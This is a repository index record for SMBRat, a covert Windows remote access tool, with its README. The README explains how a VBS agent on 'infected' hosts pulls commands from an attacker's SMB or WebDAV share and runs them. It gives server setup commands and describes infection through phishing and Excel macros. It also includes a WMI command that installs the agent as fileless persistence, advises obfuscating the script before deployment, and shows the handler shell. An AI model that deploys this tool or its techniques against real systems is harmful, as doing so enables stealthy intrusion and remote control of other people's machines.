{"id":13389859,"url":"https://github.com/operatorequals/SMBRat","last_synced_at":"2025-03-13T14:32:07.139Z","repository":{"id":75562761,"uuid":"126842633","full_name":"operatorequals/SMBRat","owner":"operatorequals","description":"A Windows Remote Administration Tool in Visual Basic with UNC paths","archived":false,"fork":false,"pushed_at":"2019-04-19T07:43:56.000Z","size":64,"stargazers_count":23,"open_issues_count":0,"forks_count":13,"subscribers_count":5,"default_branch":"master","last_synced_at":"2024-10-26T11:33:30.336Z","etag":null,"topics":["persistence","remote-admin-tool","shell","smb","vbs","visual-basic","windows","wmi"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/operatorequals.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2018-03-26T14:36:59.000Z","updated_at":"2023-09-28T10:49:18.000Z","dependencies_parsed_at":"2023-06-06T22:15:11.110Z","dependency_job_id":null,"html_url":"https://github.com/operatorequals/SMBRat","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/operatorequals%2FSMBRat","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/operatorequals%2FSMBRat/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/operatorequals%2FSMBRat/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/operatorequals%2FSMBRat/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/oper
atorequals","download_url":"https://codeload.github.com/operatorequals/SMBRat/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243422633,"owners_count":20288494,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["persistence","remote-admin-tool","shell","smb","vbs","visual-basic","windows","wmi"],"created_at":"2024-07-30T13:01:36.304Z","updated_at":"2025-03-13T14:32:06.083Z","avatar_url":"https://github.com/operatorequals.png","language":"Python","funding_links":[],"categories":["Python","Python (1887)"],"sub_categories":[],"readme":"# SMBRat\nA Windows Remote Administration Tool in *Visual Basic Script*\n\n\n## Idea\n*Windows Environments* like *Active Directory* Networks, get really bloated with *SMB* traffic.\n\nAll hosts get *Policies* from the *SYSVOL*, configurations need remote files to work, desktop shortcuts tend to point to ``\\\\something\\else\\in\\the\\network.exe``.\n\nNone would notice one more connection attempt. *Right?*\n\n \\- Especially if it succeeds (it is a fashion to only monitor *Firewall* ***Denies***)\n\n\n## Ingredients\n\n\n### Agent\n\n#### Documentation/Archiving Friendly\nThe `agent` is a *Visual Basic Script* that runs on the infected host and connects to the *SMB Server*. It creates a directory in there named after the host's `hostname` and primary `MAC` address (trying to be *unique* and *informative* at the same time for reporting purposes). All commands and info for the infected Host will be stored in this directory. 
`zip`ping the whole Shared Folder will archive all project info!\n\n#### Stealthy\nIt does **NOT** use a drive letter to *Mount* the Share, just uses `UNC paths` to directly read remote files (no *Drive* is created in `explorer.exe`).\n\nIt also injects the `UNC path` into the `%PATH%` variable of its own execution environment (you can run executables directly from your Linux machine's filesystem).\n\n#### Agent's Execution\n\nThe `agent` is configured to **run once**. **Statelessly**.\n\nIts routine is (more or less) as follows:\n* It looks for a file named `exec.dat` in the folder it created in the *SMB Share*\n* If it finds the file, it **reads its content** and executes it as a command with `cmd.exe /c \u003ccommand\u003e` like a *semi-interactive shell*.\n* The command's response is stored in `output.dat` (next to `exec.dat`).\n* It deletes the `exec.dat` file.\n\n##### [Wiki Page for Setting the *Agent*](https://github.com/operatorequals/SMBRat/wiki/Agent)\n\n\n\n### Handler\n\nThe `handler` needs an *SMB Server* to work. 
The `smbserver.py` module from [*Core Security's* `impacket`](https://github.com/coresecurity/impacket) package will do.\n\nMost probably `smbd` would also do the trick, but hasn't been tested yet.\n\n#### Setting up the *SMB Server*\n\nA share with name `D$` is needed, to look like a legit Windows host's SMB.\n\n```bash\n# mkdir Share\n# smbserver.py -comment \"My Share\" \"D$\" Share/\nImpacket v0.9.17-dev - Copyright 2002-2018 Core Security Technologies\n\n[*] Config file parsed\n[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0\n[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0\n[*] Config file parsed\n[*] Config file parsed\n[*] Config file parsed\n\n```\n#### The *WebDAV* case!\nAs the `agent` is configured to only use UNC paths, WebDAV can also be used with **zero-changes**.\nInstead of an SMB server, a *WebDAV server* can be used (a great WebDAV server with SSL support is [wsgidav](https://github.com/mar10/wsgidav/)).\n\n```bash\n# mkdir 'D$'\n# wsgidav -p 80 -H 0.0.0.0 -r . --auth anonymous\n[...] INFO    :  WsgiDAV/3.0.0 Python/2.7.16 Linux-4.19.0-kali3-amd64-x86_64-with-Kali-kali-rolling-kali-rolling\n[...] INFO    :  Lock manager:      LockManager(LockStorageDict)\n[...] INFO    :  Property manager:  None\n[...] INFO    :  Domain controller: SimpleDomainController()\n[...] INFO    :  Registered DAV providers by route:\n[...] INFO    :    - '/:dir_browser': FilesystemProvider for path '/root/.virtualenvs/wsgidav/local/lib/python2.7/site-packages/wsgidav/dir_browser/htdocs' (Read-Only) (anonymous)\n[...] INFO    :    - '/': FilesystemProvider for path '/tmp/DAV' (Read-Write) (anonymous)\n[...] WARNING :  Basic authentication is enabled: It is highly recommended to enable SSL.\n[...] WARNING :  Share '/:dir_browser' will allow anonymous read access.\n[...] WARNING :  Share '/' will allow anonymous write access.\n[...] INFO    :  Running WsgiDAV/3.0.0 Cheroot/6.5.4 Python/2.7.16\n[...] 
INFO    :  Serving on http://0.0.0.0:80 ...\n\n[...] INFO    :  192.168.163.130 - (anonymous) - [2019-04-18 14:57:53] \"PROPFIND /D$/Project1/DESKTOP-I3NFOQ5-John-AA-BB-CC-DD-EE-FF/ping.dat\" length=0, depth=0, elap=0.004sec -\u003e 207 Multi-Status\n```\nFor the SSL support, the UNC paths have to change slightly, from:\n```\n\\\\\u003cServer-IP\u003e\\DIR\\\n```\nto:\n```\n\\\\\u003cServer-IP\u003e@SSL@443\\DIR\\\n```\nThis change can only be done to `ServerName` `agent.vbs` variable, as all paths are constructed by this.\nKeep in mind that the SSL certificates have to be **trusted by the system running the `agent`**. Self-signed Certificates **will fail** with warnings.\n\n\n## Infection Scheme\n\n### Infect a Host from a file\nA *While loop* can be added to the `agent.vbs` file's beginning, with a delay statement of multiple seconds (10 secs is ideal), and it will be able to infect windows hosts by *double clicking* / *phishing* / *excel macros* / etc...\n\nA `while True` loop in *VBS* with delay of 1 second looks like this:\n```vb\nDo While True\n\t[...]\n\tWScript.Sleep 1000\nLoop\n```\n\n### Infect a Host *fileless*\nYet, if a Windows host has *RPC* enabled, it is possible to install the *VBS* file as *fileless malware* through `WMI` and the fabulous `impacket` package examples with a command like:\n```bash\n$ examples/wmipersist.py '\u003cusername\u003e:\u003cpassword\u003e@\u003chostname/ipaddress\u003e' install -vbs agent.vbs -name smbrat -timer 10\n```\n\nIt is also possible to utilize the `WMI` tool by local access to install the `agent.vbs` as fileless malware.\n\n### Obfuscation?\nVisual Basic Scripts can be nicely *obfuscated*, *base64*'d as well as *minified*.\n\nIt can be really handy to give it a spin before \"deploying\" :wink:\n* [Online Tool for VBS Obfuscation](https://isvbscriptdead.com/vbs-obfuscator/)\n* [Github Repo](https://github.com/DoctorLai/VBScript_Obfuscator)\n\n## [Directory Structure in the *SMB 
Share*](https://github.com/operatorequals/SMBRat/wiki/Directory-Structure)\n\n\n#### Never create folders manually in the Shared Folder\n\n\n\n## Barebone Usage\n\n~~At time of writing, no `Handler` shell is implemented,~~ so usage can be done by just using a command like `watch` to inspect the `output.dat` file:\n\n```bash\n$ watch -n0.2 cat Share/projectName/DESKTOP-XXXXXXX-AA\\:BB\\:CC\\:DD\\:EE\\:FF/output.dat\n```\nand `echo` to write stuff to the `exec.dat` file:\n```bash\n$ echo 'whoami /all' \u003e Share/projectName/DESKTOP-XXXXXXX-AA\\:BB\\:CC\\:DD\\:EE\\:FF/exec.dat\n```\n\n## The `handler.py`\n\nThe experimental shell works as follows: \n```bash\n$ python handler.py Share/\nSMBRat\u003e \n# When a new host gets infected:\n[+] Agent \"DESKTOP-EG4OE7J\" (00:0C:29:2B:9F:AF) just checked-in for Project: \"projectName\"\n\nSMBRat\u003e execall whoami /user\n\n[\u003e] Sending 'whoami /user' to \"projectName/DESKTOP-EG4OE7J-00:0C:29:2B:9F:AF\" ...\n\t\t\nSMBRat\u003e \n[\u003c] Response from 'projectName/DESKTOP-EG4OE7J-00:0C:29:2B:9F:AF': \n\n\nUSER INFORMATION\n----------------\n\nUser Name           SID     \n=================== ========\nnt authority\\system S-1-5-18\n\n^^^^^^^^^^^^^^^^^^^^ projectName/DESKTOP-EG4OE7J-00:0C:29:2B:9F:AF ^^^^^^^^^^^^^^^^^^^^\nSMBRat\u003e \n\t\t\t\t\n```\n\n## Outstanding Pitfalls\n\n### SMBv1 is **Not Encrypted** :\n\n```bash\n# tcpdump -i eth0 -A\ntcpdump: verbose output suppressed, use -v or -vv for full protocol decode\nlistening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes\n\n[...]\n\n15:25:06.695502 IP Deskjet-4540.microsoft-ds \u003e 172.16.47.129.3128: Flags [P.], seq 2876:2971, ack 4791, win 2110, length 95 SMB PACKET: SMBreadX (REPLY)\n\nE...,E@.@.V.../.../....8\n.\u0026Mi~.6P..\u003e.......[.SMB........................\n.@............ .;........... 
.net localgroup \"administrators\"\n\n[...]\n\n15:25:06.702916 IP 172.16.47.129.3128 \u003e Deskjet-4540.microsoft-ds: Flags [P.], seq 4917:5111, ack 3097, win 2052, length 194 SMB PACKET: SMBtrans2 (REQUEST)\n\nE...E.@......./.../..8..i~..\n.'*P....b.......SMB2......................\n\n.F..z.....(...........z.D.........}..........\\.p.r.o.j.e.c.t.N.a.m.e.\\.D.E.S.K.T.O.P.-.E.G.4.O.E.7.J.-.0.0.:.0.C.:.2.9.:.2.B.:.9.F.:.A.F.\\.o.u.t.p.u.t...d.a.t...\n\n[...]\n\n15:25:06.751372 IP 172.16.47.129.3128 \u003e Deskjet-4540.microsoft-ds: Flags [P.], seq 6049:6393, ack 3748, win 2050, length 344 SMB PACKET: SMBwrite (REQUEST)\n\nE...E.@....L../.../..8..i~. \n.).P....*.....T.SMB........................\n.T....$.......'..$.Alias name     administrators\nComment        Administrators have complete and unrestricted access to the computer/domain\n\nMembers\n\n-------------------------------------------------------------------------------\nAdmin\nAdministrator\ndefaultuser0\nThe command completed successfully.\n\n[...]\n\n```\n\nThe traffic (file *contents* and *paths*) is transferred in plaintext if an *SMBv1 Server* is used (e.g. `impacket`'s `smbserver.py`).\n\n* An encryption/obfuscation layer would totally solve this one!\n\n### The whole Share is *READ/WRITE* to Everyone:\n\nAll Agents can modify files stored in the **Whole Share**, meaning they can modify the `exec.dat` of other Agents...\nAn `smbmap` will shed light:\n```bash\n$ smbmap -H 172.16.47.189\n[+] Finding open SMB ports....\n[+] User SMB session establishd on 172.16.47.189...\n[+] IP: 172.16.47.189:445\tName: Deskjet-4540                                      \n\tDisk                                                  \tPermissions\n\t----                                                  \t-----------\n\tD$                                                \tREAD, WRITE\n\t[!] 
Unable to remove test directory at \\\\172.16.47.189\\D$\\SVNRmxBFAO, plreae remove manually\n\tIPC$                                              \tREAD, WRITE\n\t[!] Unable to remove test directory at \\\\172.16.47.189\\IPC$\\SVNRmxBFAO, plreae remove manually\n```\n#### Pay attention to the lack of `-u` and `-p` parameters of `smbmap`.\nThis is a *NULL session* (like FTP anonymous login). **EVERYONE can change the SHARE Files** and get *Remote Code Execution* on all infected machines.\n\n* Better fire up some `iptables` here...\n\n### The sessions are NOT **Interactive**\n\nType `execall netsh` and you have lost all your Agents. None will respond, as the `agent.vbs` will spawn the `netsh.exe` shell and wait for it to terminate, so it can write its output to `output.dat`. But guess what... It **won't** terminate... It's gonna hang with the `netsh\u003e` prompt pointing to the void.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Foperatorequals%2FSMBRat","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Foperatorequals%2FSMBRat","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Foperatorequals%2FSMBRat/lists"}